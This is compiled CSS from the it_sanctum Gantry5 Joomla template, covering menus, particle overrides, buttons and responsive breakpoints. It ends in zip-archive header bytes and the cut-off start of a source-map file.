.g-our-team.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a:hover, .g-our-team-slider.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a:hover, .g-our-team-slideset.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a:hover {
  text-decoration: underline;
}
/* line 4, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
/* line 5, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul {
  margin: 0;
  list-style: none;
  background: #fff;
  border: 1px solid #ddd;
  border-radius: 3px;
}
/* line 11, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
/* line 12, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li a {
  padding: 0.625rem 1.25rem;
  color: #959595;
  display: block;
  border-bottom: 1px solid #ddd;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
/* line 18, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li a:hover {
  background: #ddd;
  color: #626262;
}
/* line 22, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li a i {
  margin-right: 5px;
}
/* line 26, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
/* line 27, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li:last-child a {
  border-bottom: none;
}
/* line 31, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li .submenu {
  border: none;
  display: none;
}
/* line 34, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li .submenu.uk-active {
  display: block;
}
/* line 36, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li .submenu.uk-active a {
  padding-left: 35px;
}
/* line 40, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
/* line 41, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li .submenu li:last-child {
  border-bottom: 1px solid #ddd;
}
/* line 46, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
/* line 47, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li.uk-active > a {
  background: #ddd;
  color: #4f953b;
}
/* line 51, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li.uk-active .submenu {
  display: block;
}
/* line 53, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li.uk-active .submenu a {
  padding-left: 35px;
}
/* line 2, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 3, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .g-particle-intro {
  margin-bottom: 3rem;
  text-align: center;
}
/* line 6, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .g-particle-intro .g-particle-intro {
  margin-bottom: 3rem;
}
/* line 9, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .g-particle-intro .g-main-title {
  margin-bottom: 0;
}
/* line 12, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .g-particle-intro .g-title-separator {
  height: 1px;
  width: 70px;
  margin: 20px auto;
  background: #ddd;
}
/* line 17, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .g-particle-intro .g-title-separator.no-intro-text {
  margin: 2.5rem auto 0;
}
/* line 24, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 25, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 26, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
#g-to-top .style1 #g-totop-button {
  border-radius: 0;
}
/* line 32, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 33, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .g-image-features-item {
  box-shadow: none;
  border-radius: 0;
}
/* line 37, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .g-image-features-image {
  position: relative;
}
/* line 39, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .g-image-features-image img {
  border-radius: 0;
}
/* line 42, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .g-image-features-image.uk-overlay {
  border-radius: 0;
}
/* line 46, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .uk-overlay-background {
  background: rgba(79, 149, 59, 0.5);
  border: 20px solid #fff;
}
/* line 50, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .g-image-features-link {
  font-style: initial;
  border-bottom: 1px solid #4f953b;
  display: inline-block;
}
/* line 55, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .g-image-features-link i {
  display: none;
}
/* line 61, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 62, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-features-particle .g-features-particle-icon, .g-features-particle .g-circle-border {
  border-radius: 0;
}
/* line 65, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 66, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 67, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-features-particle .g-features-particle-item:hover .g-circle-border {
  border-color: #ddd;
}
/* line 74, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 75, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 76, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-features2-particle.style5 .g-features2-particle-icon {
  border-radius: 0;
}
/* line 82, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 83, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-slideshow .g-slideshow-title, .g-slideshow .g-slideshow-desc {
  color: #959595 !important;
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .g-slideshow-title, .g-slideshow .g-slideshow-desc {
    display: initial;
  }
}
/* line 90, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-slideshow .uk-overlay-background {
  background: transparent;
}
/* line 93, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 94, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-slideshow .style2 .g-slideshow-title {
  font-size: 3rem;
  color: #959595 !important;
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .style2 .g-slideshow-title {
    font-size: 1rem;
  }
}
/* line 101, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-slideshow .style2 .g-slideshow-desc {
  font-size: 3rem;
  background: #4f953b;
  font-family: "Cormorant SC";
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .style2 .g-slideshow-desc {
    font-size: 1rem;
    display: initial;
  }
}
@media only all and (max-width: 47.938rem) {
  /* line 112, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
  .g-slideshow .uk-slideshow > li {
    min-height: 300px;
  }
}
/* line 116, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-slideshow .uk-dotnav {
  margin-left: -15px;
}
/* line 121, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 122, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
  border: 1px solid #ddd;
}
/* line 125, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro .g-content-pro-item .uk-overlay-bottom, .g-content-pro-slider .g-content-pro-item .uk-overlay-bottom, .g-content-pro-slideset .g-content-pro-item .uk-overlay-bottom {
  top: 0px;
}
/* line 129, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 130, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-content-pro-item, .g-content-pro-slider.style3 .g-content-pro-item, .g-content-pro-slideset.style3 .g-content-pro-item {
  border: none;
}
/* line 133, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2, .g-content-pro-slider.style3 .g-info-container-style2, .g-content-pro-slideset.style3 .g-info-container-style2 {
  background: rgba(255, 255, 255, 0.9);
  border: 0px;
  margin: 1.5rem;
  display: -webkit-box;
  display: -moz-box;
  display: box;
  display: -webkit-flex;
  display: -moz-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -moz-box-align: center;
  box-align: center;
  -webkit-align-items: center;
  -moz-align-items: center;
  -ms-align-items: center;
  -o-align-items: center;
  align-items: center;
  -ms-flex-align: center;
  -webkit-align-content: center;
  -moz-align-content: center;
  align-content: center;
  -ms-flex-line-pack: center;
  -webkit-box-lines: multiple;
  -moz-box-lines: multiple;
  box-lines: multiple;
  -webkit-flex-wrap: wrap;
  -moz-flex-wrap: wrap;
  -ms-flex-wrap: wrap;
  flex-wrap: wrap;
}
/* line 142, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-title, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-title, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-title {
  margin: 0 auto;
}
/* line 144, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-title a, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-title a, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-title a {
  color: #4f953b;
}
/* line 146, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-title a:hover, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-title a:hover, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-title a:hover {
  text-decoration: none;
  color: #325e25;
}
/* line 151, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-title:after, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-title:after, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-title:after {
  content: "";
  width: 70px;
  height: 1px;
  display: block;
  background: #4f953b;
  margin: 1rem auto;
}
/* line 160, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-desc, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-desc, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-desc {
  color: #959595;
}
/* line 163, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-special, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-special, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-special {
  color: #959595;
}
/* line 166, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 a, .g-content-pro-slider.style3 .g-info-container-style2 a, .g-content-pro-slideset.style3 .g-info-container-style2 a {
  color: #4f953b;
}
/* line 168, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 a:hover, .g-content-pro-slider.style3 .g-info-container-style2 a:hover, .g-content-pro-slideset.style3 .g-info-container-style2 a:hover {
  text-decoration: none;
  color: #325e25;
}
/* line 173, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 174, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-image .uk-overlay-area-content, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-image .uk-overlay-area-content, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-image .uk-overlay-area-content {
  display: inline-block !important;
}
/* line 180, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro .uk-overlay-background, .g-content-pro-slider .uk-overlay-background, .g-content-pro-slideset .uk-overlay-background {
  background: rgba(79, 149, 59, 0.5);
  border: 20px solid #fff;
}
/* line 186, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 187, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-accordion .g-accordion-item {
  margin-bottom: 10px;
}
/* line 188, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-accordion .g-accordion-item .uk-accordion-title {
  background: #fff;
  padding: 0.675rem 1rem;
  border-radius: 0;
  margin-bottom: 0;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
/* line 194, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-accordion .g-accordion-item .uk-accordion-title:hover, .g-accordion .g-accordion-item .uk-accordion-title.uk-active {
  border: 1px solid #ddd;
  background: transparent;
}
/* line 200, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-accordion .g-accordion-item .uk-accordion-content {
  color: #fff;
  background: rgba(0, 0, 0, 0.8);
  padding: 15px;
}
/* line 206, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-accordion .g-accordion-item:last-child {
  margin-bottom: 0;
}
/* line 212, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 213, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul {
  border-radius: 0;
}
/* line 216, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 217, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul li a {
  padding: 1rem;
}
/* line 219, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul li a:hover {
  color: #fff;
  background: #4f953b;
}
/* line 224, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 225, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul li:first-child a {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
/* line 229, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 230, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul li:last-child a {
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
/* line 234, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 235, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul li.uk-active > a {
  color: #fff;
  background: #4f953b;
}
/* line 241, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 242, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 243, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul .submenu li a {
  border-radius: 0;
  padding: 1rem;
}
/* line 252, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 253, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 254, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
  border-radius: 0;
}
/* line 258, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 259, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 260, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-portfolio .g-portfolio-item .g-portfolio-image .uk-overlay-background {
  background: rgba(79, 149, 59, 0.5);
  border: 20px solid #fff;
}
/* line 268, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 270, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 271, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .offcanvas-toggle-particle.g-offcanvas-toggle {
  color: #008056;
}
/* line 273, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .offcanvas-toggle-particle.g-offcanvas-toggle:hover {
  color: #4f953b;
}
/* line 2, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
/* line 3, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn, #g-offcanvas .btn {
  display: inline-block;
  padding: 0.5rem 1rem;
  border-radius: 0;
  color: #959595;
  background: transparent;
  border: 1px solid #bbb;
  line-height: 1.5;
  font-size: 0.9rem;
  vertical-align: middle;
  text-shadow: none;
  box-shadow: none;
  text-align: center;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
/* line 17, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn:hover, #g-offcanvas .btn:hover {
  background: #959595;
  color: #fff;
  border-color: #959595;
}
/* line 22, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn:active, #g-offcanvas .btn:active, #g-page-surround .btn:focus, #g-offcanvas .btn:focus {
  background: #959595;
  color: #fff;
}
/* line 26, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-primary, #g-offcanvas .btn.btn-primary {
  color: #fff;
  background: #4f953b;
  border: 1px solid #4f953b;
}
/* line 30, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-primary:hover, #g-offcanvas .btn.btn-primary:hover, #g-page-surround .btn.btn-primary:active, #g-offcanvas .btn.btn-primary:active, #g-page-surround .btn.btn-primary:focus, #g-offcanvas .btn.btn-primary:focus {
  background: #282828;
  color: #fff;
  border: 1px solid #282828;
}
/* line 36, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-info, #g-offcanvas .btn.btn-info {
  color: #fff;
  background: #5bc0de;
  border-color: #5bc0de;
}
/* line 40, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-info:hover, #g-offcanvas .btn.btn-info:hover, #g-page-surround .btn.btn-info:active, #g-offcanvas .btn.btn-info:active, #g-page-surround .btn.btn-info:focus, #g-offcanvas .btn.btn-info:focus {
  background: #85d0e7;
  border-color: #85d0e7;
}
/* line 45, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-success, #g-offcanvas .btn.btn-success {
  color: #fff;
  background: #2ecc71;
  border-color: #2ecc71;
}
/* line 49, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-success:hover, #g-offcanvas .btn.btn-success:hover, #g-page-surround .btn.btn-success:active, #g-offcanvas .btn.btn-success:active, #g-page-surround .btn.btn-success:focus, #g-offcanvas .btn.btn-success:focus {
  background: #54d98c;
  border-color: #54d98c;
}
/* line 54, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-warning, #g-offcanvas .btn.btn-warning {
  color: #fff;
  background: #f39c12;
  border-color: #f39c12;
}
/* line 58, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-warning:hover, #g-offcanvas .btn.btn-warning:hover, #g-page-surround .btn.btn-warning:active, #g-offcanvas .btn.btn-warning:active, #g-page-surround .btn.btn-warning:focus, #g-offcanvas .btn.btn-warning:focus {
  background: #f5b043;
  border-color: #f5b043;
}
/* line 63, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-danger, #g-offcanvas .btn.btn-danger {
  color: #fff;
  background: #c0392b;
  border-color: #c0392b;
}
/* line 67, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-danger:hover, #g-offcanvas .btn.btn-danger:hover, #g-page-surround .btn.btn-danger:active, #g-offcanvas .btn.btn-danger:active, #g-page-surround .btn.btn-danger:focus, #g-offcanvas .btn.btn-danger:focus {
  background: #d65548;
  border-color: #d65548;
}
/* line 72, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-inverse, #g-offcanvas .btn.btn-inverse {
  color: #fff;
  background: #2c3e50;
  border-color: #2c3e50;
}
/* line 76, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-inverse:hover, #g-offcanvas .btn.btn-inverse:hover, #g-page-surround .btn.btn-inverse:active, #g-offcanvas .btn.btn-inverse:active, #g-page-surround .btn.btn-inverse:focus, #g-offcanvas .btn.btn-inverse:focus {
  background: #3e5871;
  border-color: #3e5871;
}
/* line 81, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-link, #g-offcanvas .btn.btn-link {
  color: #4f953b;
  background: transparent;
  border: none;
  padding: initial;
}
/* line 86, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-link:hover, #g-offcanvas .btn.btn-link:hover, #g-page-surround .btn.btn-link:active, #g-offcanvas .btn.btn-link:active, #g-page-surround .btn.btn-link:focus, #g-offcanvas .btn.btn-link:focus {
  color: #325e25;
}
/* line 90, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-large, #g-offcanvas .btn.btn-large {
  font-size: 1.125rem;
  padding: 0.8rem 1.3rem;
}
/* line 96, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
/* line 97, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn-group > .btn, #g-offcanvas .btn-group > .btn {
  border-radius: 0;
}
/* line 100, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn-group > .btn:first-child, #g-offcanvas .btn-group > .btn:first-child {
  border-bottom-left-radius: 0;
  border-top-left-radius: 0;
}
/* line 103, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn-group > .btn:last-child, #g-offcanvas .btn-group > .btn:last-child {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
}
/* line 109, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
/* line 110, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .readmore .btn, #g-offcanvas .readmore .btn, #g-page-surround .search-form-results .btn, #g-offcanvas .search-form-results .btn {
  background: #4f953b;
  color: #fff;
  border: none;
  -webkit-transition: background 0.2s;
  -moz-transition: background 0.2s;
  transition: background 0.2s;
}
/* line 115, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .readmore .btn:hover, #g-offcanvas .readmore .btn:hover, #g-page-surround .search-form-results .btn:hover, #g-offcanvas .search-form-results .btn:hover, #g-page-surround .readmore .btn:active, #g-offcanvas .readmore .btn:active, #g-page-surround .search-form-results .btn:active, #g-offcanvas .search-form-results .btn:active, #g-page-surround .readmore .btn:focus, #g-offcanvas .readmore .btn:focus, #g-page-surround .search-form-results .btn:focus, #g-offcanvas .search-form-results .btn:focus {
  background: #282828;
  color: #fff;
}
/* line 121, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
/* line 122, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .search-form-results .btn, #g-offcanvas .search-form-results .btn {
  line-height: 1.5;
}
/* line 2, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_flex.scss */
.g-container {
  width: 75rem;
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  .g-container {
    width: 60rem;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-container {
    width: 48rem;
  }
}
@media only all and (min-width: 30.062rem) and (max-width: 47.938rem) {
  .g-container {
    width: 30rem;
  }
}
@media only all and (max-width: 30rem) {
  .g-container {
    width: 100%;
  }
}
/* line 17, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_flex.scss */
.g-container.g-flushed {
  width: 100%;
}
/* line 23, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_flex.scss */
@media only all and (max-width: 47.938rem) {
  .g-block {
    -webkit-flex-grow: 0;
    -moz-flex-grow: 0;
    flex-grow: 0;
    -ms-flex-positive: 0;
    -webkit-flex-basis: 100%;
    -moz-flex-basis: 100%;
    flex-basis: 100%;
    -ms-flex-preferred-size: 100%;
  }
}
/* line 30, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_flex.scss */
@media only all and (max-width: 47.938rem) {
  body [class*="size-"] {
    -webkit-flex-grow: 0;
    -moz-flex-grow: 0;
    flex-grow: 0;
    -ms-flex-positive: 0;
    -webkit-flex-basis: 100%;
    -moz-flex-basis: 100%;
    flex-basis: 100%;
    -ms-flex-preferred-size: 100%;
    max-width: 100%;
  }
}
@media only all and (max-width: 47.938rem) {
  @supports not (flex-wrap: wrap) {
    /* line 41, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_flex.scss */
    .g-grid {
      display: block;
      -webkit-box-lines: inherit;
      -moz-box-lines: inherit;
      box-lines: inherit;
      -webkit-flex-wrap: inherit;
      -moz-flex-wrap: inherit;
      -ms-flex-wrap: inherit;
      flex-wrap: inherit;
    }
    /* line 45, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_flex.scss */
    .g-block {
      display: block;
      -webkit-box-flex: inherit;
      -moz-box-flex: inherit;
      box-flex: inherit;
      -webkit-flex: inherit;
      -moz-flex: inherit;
      -ms-flex: inherit;
      flex: inherit;
    }
  }
}
/* line 2, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
.visible-large, .visible-desktop, .visible-tablet, .visible-phone, .g-block.visible-large, .g-block.visible-desktop, .g-block.visible-tablet, .g-block.visible-phone {
  display: none !important;
}
@media only all and (max-width: 47.938rem) {
  /* line 14, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .visible-phone {
    display: block !important;
  }
  /* line 17, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .g-block.visible-phone {
    display: block !important;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  /* line 23, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .visible-tablet {
    display: block !important;
  }
  /* line 26, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .g-block.visible-tablet {
    display: block !important;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  /* line 32, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .visible-desktop {
    display: block !important;
  }
  /* line 35, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .g-block.visible-desktop {
    display: block !important;
  }
}
@media only all and (min-width: 75rem) {
  /* line 41, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .visible-large {
    display: block !important;
  }
  /* line 44, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .g-block.visible-large {
    display: block !important;
  }
  /* line 47, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .visible-desktop {
    display: block !important;
  }
  /* line 50, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .g-block.visible-desktop {
    display: block !important;
  }
}
@media only all and (max-width: 47.938rem) {
  /* line 57, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .hidden-phone {
    display: none !important;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  /* line 63, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .hidden-tablet {
    display: none !important;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  /* line 69, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .hidden-desktop {
    display: none !important;
  }
}
@media only all and (min-width: 75rem) {
  /* line 75, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .hidden-large {
    display: none !important;
  }
  /* line 78, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .hidden-desktop {
    display: none !important;
  }
}
@media only all and (max-width: 47.938rem) {
  /* line 85, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .align-right {
    text-align: inherit !important;
  }
  /* line 88, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .align-left {
    text-align: inherit !important;
  }
}
/*# sourceMappingURL=sanctum.css.map */PK!�j�q3�3�9it_sanctum/custom/css-compiled/sanctum__body_only.css.mapnu&1i�{"version":3,"sourceRoot":"\/","sources":["\/(stdin)","\/media\/gantry5\/engines\/nucleus\/scss\/nucleus\/mixins\/_nav.scss","\/media\/gantry5\/engines\/nucleus\/scss\/nucleus\/mixins\/_utilities.scss","\/media\/gantry5\/engines\/nucleus\/scss\/nucleus\/theme\/_flex.scss","\/media\/gantry5\/engines\/nucleus\/scss\/nucleus\/theme\/_typography.scss","\/media\/gantry5\/engines\/nucleus\/scss\/nucleus\/theme\/_forms.scss","\/templates\/it_sanctum\/scss\/sanctum\/_core.scss","\/media\/gantry5\/engines\/nucleus\/scss\/nucleus\/mixins\/_breakpoints.scss","\/templates\/it_sanctum\/scss\/sanctum\/_typography.scss","\/templates\/it_sanctum\/scss\/sanctum\/_navigation.scss","\/templates\/it_sanctum\/scss\/sanctum\/_mainnav.scss","\/templates\/it_sanctum\/scss\/sanctum\/_menu.scss","\/templates\/it_sanctum\/scss\/sanctum\/_offcanvas.scss","\/templates\/it_sanctum\/scss\/sanctum\/_drawer.scss","\/templates\/it_sanctum\/scss\/sanctum\/_top.scss","\/templates\/it_sanctum\/scss\/sanctum\/_header.scss","\/templates\/it_sanctum\/scss\/sanctum\/_breadcrumb.scss","\/templates\/it_sanctum\/scss\/sanctum\/_fullwidth.scss","\/templates\/it_sanctum\/scss\/sanctum\/_showcase.scss","\/templates\/it_sanctum\/scss\/sanctum\/_intro.scss","\/templates\/it_sanctum\/scss\/sanctum\/_feature.scss","\/templates\/it_sanctum\/scss\/sanctum\/_subfeature.scss","\/templates\/it_sanctum\/scss\/sanctum\/_utility.scss","\/templates\/it_sanctum\/scss\/sanctum